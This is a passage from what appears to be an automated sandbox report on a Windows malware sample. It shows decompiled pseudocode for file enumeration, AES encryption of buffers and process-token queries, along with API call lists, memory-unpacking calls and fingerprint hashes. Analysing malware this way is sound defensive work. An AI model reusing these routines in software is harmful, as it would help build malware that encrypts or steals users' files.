                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}











































                                                                                                                                                                                                                                                                                    0x00a7513d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7513d
                                                                                                                                                                                                                                                                                    0x00a74ef8
                                                                                                                                                                                                                                                                                    0x00a74f03
                                                                                                                                                                                                                                                                                    0x00a74f08
                                                                                                                                                                                                                                                                                    0x00a74f0d
                                                                                                                                                                                                                                                                                    0x00a74f10
                                                                                                                                                                                                                                                                                    0x00a74f17
                                                                                                                                                                                                                                                                                    0x00a74f1e
                                                                                                                                                                                                                                                                                    0x00a74f21
                                                                                                                                                                                                                                                                                    0x00a75123
                                                                                                                                                                                                                                                                                    0x00a7512d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7512d
                                                                                                                                                                                                                                                                                    0x00a74f37
                                                                                                                                                                                                                                                                                    0x00a74f3b
                                                                                                                                                                                                                                                                                    0x00a74f3e
                                                                                                                                                                                                                                                                                    0x00a74f41
                                                                                                                                                                                                                                                                                    0x00a74f49
                                                                                                                                                                                                                                                                                    0x00a74f4c
                                                                                                                                                                                                                                                                                    0x00a74f55
                                                                                                                                                                                                                                                                                    0x00a74f5b
                                                                                                                                                                                                                                                                                    0x00a74f65
                                                                                                                                                                                                                                                                                    0x00a74f6c
                                                                                                                                                                                                                                                                                    0x00a74f6c
                                                                                                                                                                                                                                                                                    0x00a74f7e
                                                                                                                                                                                                                                                                                    0x00a74f89
                                                                                                                                                                                                                                                                                    0x00a74f97
                                                                                                                                                                                                                                                                                    0x00a74f9c
                                                                                                                                                                                                                                                                                    0x00a74fa1
                                                                                                                                                                                                                                                                                    0x00a74fa4
                                                                                                                                                                                                                                                                                    0x00a74fa9
                                                                                                                                                                                                                                                                                    0x00a74fb3
                                                                                                                                                                                                                                                                                    0x00a74fb6
                                                                                                                                                                                                                                                                                    0x00a74fb9
                                                                                                                                                                                                                                                                                    0x00a74fcf
                                                                                                                                                                                                                                                                                    0x00a74fd3
                                                                                                                                                                                                                                                                                    0x00a74fd6
                                                                                                                                                                                                                                                                                    0x00a75121
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a75121
                                                                                                                                                                                                                                                                                    0x00a74fed
                                                                                                                                                                                                                                                                                    0x00a7503e
                                                                                                                                                                                                                                                                                    0x00a75001
                                                                                                                                                                                                                                                                                    0x00a75009
                                                                                                                                                                                                                                                                                    0x00a7500e
                                                                                                                                                                                                                                                                                    0x00a7501c
                                                                                                                                                                                                                                                                                    0x00a75025
                                                                                                                                                                                                                                                                                    0x00a7502e
                                                                                                                                                                                                                                                                                    0x00a7502e
                                                                                                                                                                                                                                                                                    0x00a7503c
                                                                                                                                                                                                                                                                                    0x00a7503c
                                                                                                                                                                                                                                                                                    0x00a75042
                                                                                                                                                                                                                                                                                    0x00a75046
                                                                                                                                                                                                                                                                                    0x00a75046
                                                                                                                                                                                                                                                                                    0x00a7504c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7504e
                                                                                                                                                                                                                                                                                    0x00a75054
                                                                                                                                                                                                                                                                                    0x00a750fb
                                                                                                                                                                                                                                                                                    0x00a750fe
                                                                                                                                                                                                                                                                                    0x00a7510b
                                                                                                                                                                                                                                                                                    0x00a7510b
                                                                                                                                                                                                                                                                                    0x00a7510f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a75104
                                                                                                                                                                                                                                                                                    0x00a75108
                                                                                                                                                                                                                                                                                    0x00a75108
                                                                                                                                                                                                                                                                                    0x00a7510a
                                                                                                                                                                                                                                                                                    0x00a7510a
                                                                                                                                                                                                                                                                                    0x00a75114
                                                                                                                                                                                                                                                                                    0x00a7511b
                                                                                                                                                                                                                                                                                    0x00a7511d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7511d
                                                                                                                                                                                                                                                                                    0x00a7505a
                                                                                                                                                                                                                                                                                    0x00a7505c
                                                                                                                                                                                                                                                                                    0x00a7505c
                                                                                                                                                                                                                                                                                    0x00a7506f
                                                                                                                                                                                                                                                                                    0x00a75075
                                                                                                                                                                                                                                                                                    0x00a75080
                                                                                                                                                                                                                                                                                    0x00a75082
                                                                                                                                                                                                                                                                                    0x00a75086
                                                                                                                                                                                                                                                                                    0x00a75088
                                                                                                                                                                                                                                                                                    0x00a75088
                                                                                                                                                                                                                                                                                    0x00a7508d
                                                                                                                                                                                                                                                                                    0x00a7508f
                                                                                                                                                                                                                                                                                    0x00a7508f
                                                                                                                                                                                                                                                                                    0x00a7508d
                                                                                                                                                                                                                                                                                    0x00a75094
                                                                                                                                                                                                                                                                                    0x00a75098
                                                                                                                                                                                                                                                                                    0x00a75098
                                                                                                                                                                                                                                                                                    0x00a750a8
                                                                                                                                                                                                                                                                                    0x00a750ad
                                                                                                                                                                                                                                                                                    0x00a750b0

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3,00A7A380), ref: 00A74EC7
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00A74EE9
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00A74F03
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00A74F1C,73797325), ref: 00A71011
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A7102B
                                                                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00A74F41
                                                                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00A74F55
                                                                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00A74F6C
                                                                                                                                                                                                                                                                                    • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00A74F78
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,642E2A5C), ref: 00A74FB9
                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?), ref: 00A74FCF
                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 00A74FED
                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00A73EAC,?), ref: 00A75001
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00A73EAC), ref: 00A7500E
                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00A7501A
                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 00A7503C
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 00A7506F
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00A72779,?,00000000), ref: 00A750A8
                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00A73EAC,?), ref: 00A750BD
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00A73EAC), ref: 00A750CA
                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00A750D6
                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 00A750E6
                                                                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00A73EAC), ref: 00A7511B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00A72779,73797325), ref: 00A7512D
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00A7513D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2944988578-0
                                                                                                                                                                                                                                                                                    • Opcode ID: def3983725bf338dd79e700728312c0fe88e3c534971f055540a881d4cac18a4
                                                                                                                                                                                                                                                                                    • Instruction ID: 91cb4bfb81455feaa2dae54a4c9d8aa33f76c2f795880a819ce5e47031539375
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: def3983725bf338dd79e700728312c0fe88e3c534971f055540a881d4cac18a4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0812C71D00119AFDF11DFA5DC84AEEBBB9FB48301F10816AE509E6160D7719E86CFA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E00A735A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				long* _v24;
                                                                                                                                                                                                                                                                                    				void* _v39;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				void _v56;
                                                                                                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				void _v67;
                                                                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                                                    				int _t79;
                                                                                                                                                                                                                                                                                    				int _t81;
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    				long _t86;
                                                                                                                                                                                                                                                                                    				int _t90;
                                                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				int _t103;
                                                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t103 = __eax;
                                                                                                                                                                                                                                                                                    				_t94 = 6;
                                                                                                                                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v67, 0, _t94 << 2);
                                                                                                                                                                                                                                                                                    				_t105 = _t104 + 0xc;
                                                                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                                                                    				_t61 =  *0xa7a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                                                                                                                                                                                                                                                                    				if(_t61 == 0) {
                                                                                                                                                                                                                                                                                    					_a8 = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t101 = 0x10;
                                                                                                                                                                                                                                                                                    					memcpy( &_v56, _a8, _t101);
                                                                                                                                                                                                                                                                                    					_t106 = _t105 + 0xc;
                                                                                                                                                                                                                                                                                    					_v60 = _t101;
                                                                                                                                                                                                                                                                                    					_v67 = 2;
                                                                                                                                                                                                                                                                                    					_v64 = 0x660e;
                                                                                                                                                                                                                                                                                    					_v68 = 8;
                                                                                                                                                                                                                                                                                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                                                                    						_a8 = GetLastError();
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                                                                    						_push( &_v40);
                                                                                                                                                                                                                                                                                    						_push(1);
                                                                                                                                                                                                                                                                                    						_push(_v12);
                                                                                                                                                                                                                                                                                    						if( *0xa7a0dc() == 0) {
                                                                                                                                                                                                                                                                                    							_a8 = GetLastError();
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t18 = _t103 + 0xf; // 0x10
                                                                                                                                                                                                                                                                                    							_t76 = _t18 & 0xfffffff0;
                                                                                                                                                                                                                                                                                    							if(_a4 != 0 && _t76 == _t103) {
                                                                                                                                                                                                                                                                                    								_t76 = _t76 + _t101;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t102 = E00A75C4E(_t76);
                                                                                                                                                                                                                                                                                    							_v20 = _t102;
                                                                                                                                                                                                                                                                                    							if(_t102 == 0) {
                                                                                                                                                                                                                                                                                    								_a8 = 8;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                                                                                                    								_a8 = 0;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									_t79 = 0x10;
                                                                                                                                                                                                                                                                                    									_v8 = _t79;
                                                                                                                                                                                                                                                                                    									if(_t103 <= _t79) {
                                                                                                                                                                                                                                                                                    										_v8 = _t103;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									memcpy(_t102, _a12, _v8);
                                                                                                                                                                                                                                                                                    									_t81 = _v8;
                                                                                                                                                                                                                                                                                    									_a12 = _a12 + _t81;
                                                                                                                                                                                                                                                                                    									_t103 = _t103 - _t81;
                                                                                                                                                                                                                                                                                    									_t106 = _t106 + 0xc;
                                                                                                                                                                                                                                                                                    									if(_a4 == 0) {
                                                                                                                                                                                                                                                                                    										_t85 =  *0xa7a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t85 =  *0xa7a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									if(_t85 == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t90 = _v8;
                                                                                                                                                                                                                                                                                    									_v16 = _v16 + _t90;
                                                                                                                                                                                                                                                                                    									_t102 = _t102 + _t90;
                                                                                                                                                                                                                                                                                    									if(_t103 != 0) {
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										L17:
                                                                                                                                                                                                                                                                                    										 *_a16 = _v20;
                                                                                                                                                                                                                                                                                    										 *_a20 = _v16;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t86 = GetLastError();
                                                                                                                                                                                                                                                                                    								_a8 = _t86;
                                                                                                                                                                                                                                                                                    								if(_t86 != 0) {
                                                                                                                                                                                                                                                                                    									E00A72A03(_v20);
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                                                                    						CryptDestroyKey(_v12);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					CryptReleaseContext(_v24, 0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _a8;
                                                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                                                    0x00a73679
                                                                                                                                                                                                                                                                                    0x00a7367b
                                                                                                                                                                                                                                                                                    0x00a7367b
                                                                                                                                                                                                                                                                                    0x00a73685
                                                                                                                                                                                                                                                                                    0x00a7368a
                                                                                                                                                                                                                                                                                    0x00a7368d
                                                                                                                                                                                                                                                                                    0x00a73690
                                                                                                                                                                                                                                                                                    0x00a73692
                                                                                                                                                                                                                                                                                    0x00a7369b
                                                                                                                                                                                                                                                                                    0x00a736c5
                                                                                                                                                                                                                                                                                    0x00a7369d
                                                                                                                                                                                                                                                                                    0x00a736ae
                                                                                                                                                                                                                                                                                    0x00a736ae
                                                                                                                                                                                                                                                                                    0x00a736cd
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a736cf
                                                                                                                                                                                                                                                                                    0x00a736d2
                                                                                                                                                                                                                                                                                    0x00a736d5
                                                                                                                                                                                                                                                                                    0x00a736d9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a736db
                                                                                                                                                                                                                                                                                    0x00a736ea
                                                                                                                                                                                                                                                                                    0x00a736f0
                                                                                                                                                                                                                                                                                    0x00a736f8
                                                                                                                                                                                                                                                                                    0x00a736f8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a736d9
                                                                                                                                                                                                                                                                                    0x00a736dd
                                                                                                                                                                                                                                                                                    0x00a736e5
                                                                                                                                                                                                                                                                                    0x00a736e8
                                                                                                                                                                                                                                                                                    0x00a736ff
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a736e8
                                                                                                                                                                                                                                                                                    0x00a7365f
                                                                                                                                                                                                                                                                                    0x00a73718
                                                                                                                                                                                                                                                                                    0x00a7371b
                                                                                                                                                                                                                                                                                    0x00a7371b
                                                                                                                                                                                                                                                                                    0x00a73730
                                                                                                                                                                                                                                                                                    0x00a73730
                                                                                                                                                                                                                                                                                    0x00a73748

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00A71B16,00000001,00A76301,00000000), ref: 00A735D9
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00A71B16,00A76301,00000010,?,?,?,00A71B16,00000001,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000), ref: 00A735F2
                                                                                                                                                                                                                                                                                    • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00A7361B
                                                                                                                                                                                                                                                                                    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00A73633
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,05569630,00000010), ref: 00A73685
                                                                                                                                                                                                                                                                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05569630,00000020,?,?,00000010), ref: 00A736AE
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000010), ref: 00A736DD
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A7370F
                                                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00A7371B
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A73723
                                                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A73730
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00A71B16,00000001,00A76301,00000000,?,00A75B47,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A73738
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3401600162-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2158032d7c67638b5fae2c6bd5e4bbb51b7d7f04ec4c7585967131c7e2b7aab3
                                                                                                                                                                                                                                                                                    • Instruction ID: 5ad6c17accb31e584679d794badb1a6dabf5556b2eaf77b21b10d147c9dda56c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2158032d7c67638b5fae2c6bd5e4bbb51b7d7f04ec4c7585967131c7e2b7aab3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6515CB2900208FFDF10DFA9DD84AAEBBB9EB44340F11C429F909E6250D7309E55AB61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1183150587.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
                                                                                                                                                                                                                                                                                    • Instruction ID: 82f0f9cb5b601b9f14a3f147ad8457523407e89c9735378e292c2c65c2a7f156
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D19C766082819FDB50CF54E880B6177AAFF88350B290194ED1DDF35AD7B0A810FBB2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                                                                    			E00A73CA1(char _a4, void* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                                                    				void** _t33;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                                                                                    				void** _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v20 = _a4;
                                                                                                                                                                                                                                                                                    				_t48 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                                                                    				_v44 = 0x18;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                                                                    					_t33 =  &_v8;
                                                                                                                                                                                                                                                                                    					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                                                                    					if(_t33 >= 0) {
                                                                                                                                                                                                                                                                                    						_t47 = __imp__;
                                                                                                                                                                                                                                                                                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                                                                    						_t44 = E00A75C4E(_a4);
                                                                                                                                                                                                                                                                                    						if(_t44 != 0) {
                                                                                                                                                                                                                                                                                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                                                                    							if(_t40 >= 0) {
                                                                                                                                                                                                                                                                                    								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                                                                    								_t48 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							E00A72A03(_t44);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						NtClose(_v8); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					NtClose(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t48;
                                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A73CE8
                                                                                                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00A73CFB
                                                                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00A73D17
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00A73D34
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A73D41
                                                                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 00A73D53
                                                                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 00A73D5D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
